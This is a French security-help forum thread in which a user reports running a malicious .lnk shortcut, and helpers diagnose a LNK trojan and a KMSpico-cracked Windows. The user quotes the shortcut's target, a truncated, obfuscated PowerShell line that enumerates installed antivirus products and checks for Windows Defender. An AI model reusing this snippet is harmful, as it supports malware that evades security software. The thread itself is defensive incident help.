Fichier potentiellement malveillant .lnk commande powershell

[theot2t]

Bonjour à tous !

J'ai exécuté par erreur un fichier que je pensais être fiable mais je me suis rendu compte que c'était un fichier en .lnk. Lorsque je suis allé dans les propriétés de ce fameux fichier, j'ai pu constaté que c'était un raccourci en .lnk avec pour cible :
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $MMmXrOF = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($jdzNLtG in $MMmXrOF ){if ($jdzNLtG.displayName -replace 'Windows Defender',

Pouvez vous me dire si ce fichier peut effectivement avoir modifier certains paramètres de mon pc ou mes données ? J'ai effectué des analyses avec AdwCleaner, Malwarebytes Anti-Malware (MBAM) et ZHPCleaner, et également une analyse FRST que voici :

FRST : https://pjjoint.malekal.com/files.php?i ... 0w10l15m13
Addition : https://pjjoint.malekal.com/files.php?i ... _n7e99e6m8
Shortcut : https://pjjoint.malekal.com/files.php?i ... 9b11w8e8o5

Merci de vos réponses !

[Parisien_entraide]

Bonsoir

Ca ne serait pas venu avec un contenu de fichier .rar avec mot de passe pour un lien video et un contenu de photos..heu.. dans sa cuisine.... . de Marion Cotillard (ou Marion Gagnot) qui contient effectivement un "HEUR:Trojan.WinLNK.Agent.gen" ?

Du reste cela t'as fait paniquer puisque tu as tout analysé avec SpyHunter, ZHP Cleaner, MalwareBytes... mais il y a eu des modifications

De toutes les façons cela se renouvellera tu es à risques : KMSpico et passage sur fitgirl (si c'est toi pour ce lien ou du fait du malware )

Malekal ou Angélique te diront ce qu'il en est mais de toutes les façons defender est désactivé et je doute que cela soit le fait qu'Avast soit activé
En plus ton script au complet, ca pointe sur une IP connue pour au moins du phishing malveillant

En attendant à lire et tu comprendras ce qu'il t'est arrivé avec le fiichier et son mot de passe

https://www.malekal.com/lnk-malware/
Et ce que tu risques avec les cracks
viewtopic.php?t=71178

[Malekal_morte]

Salut,

Quel fichier est détecté ?



Ton Windows est cracké avec KMSPico :

Date: 2022-11-17 18:14:33
Description:
Antivirus Microsoft Defender a détecté un logiciel malveillant ou potentiellement indésirable.
Pour plus d’informations, reportez-vous aux éléments suivants :
Nom : HackTool:MSIL/AutoKMS
ID : 2147711767
Gravité : Élevée
Catégorie : Outil
Chemin : file:_C:\Program Files\KMSpico\AutoPico.exe; file:_C:\Program Files\KMSpico\KMSELDI.exe
Origine de la détection : Ordinateur local
Type de détection : Concret
Source de détection : Protection en temps réel
Utilisateur : DESKTOP-PNOR397\theot
Nom du processus : C:\Program Files\Avast Software\Avast\AvastUI.exe
Version de la veille de sécurité : AV: 1.323.376.0, AS: 1.323.376.0, NIS: 1.323.376.0
Version du moteur : AM: 1.1.17400.5, NIS: 1.1.17400.5

Tu as l'air d'avoir des extensions parasites sur Firefox.
Réinitialise/Répare les navigateurs WEB concerné(s) par les problèmes :

• Réparer Mozilla Firefox (premier paragraphe)
• Réparer Google Chrome (premier paragraphe)

~~

A désinstaller :

CCleaner (inutile)
Driver Booster (inutile et peut planter Windows)
Java (sauf si tu sais en avoir besoin)
MEGAsync (sauf si tu synchronises avec)
WinRAR

[Malekal_morte]

A lire sur le sujet : Trojan LNK, Trojan.VBS et Malware PowerShell : Exemple d'une campagne visant la France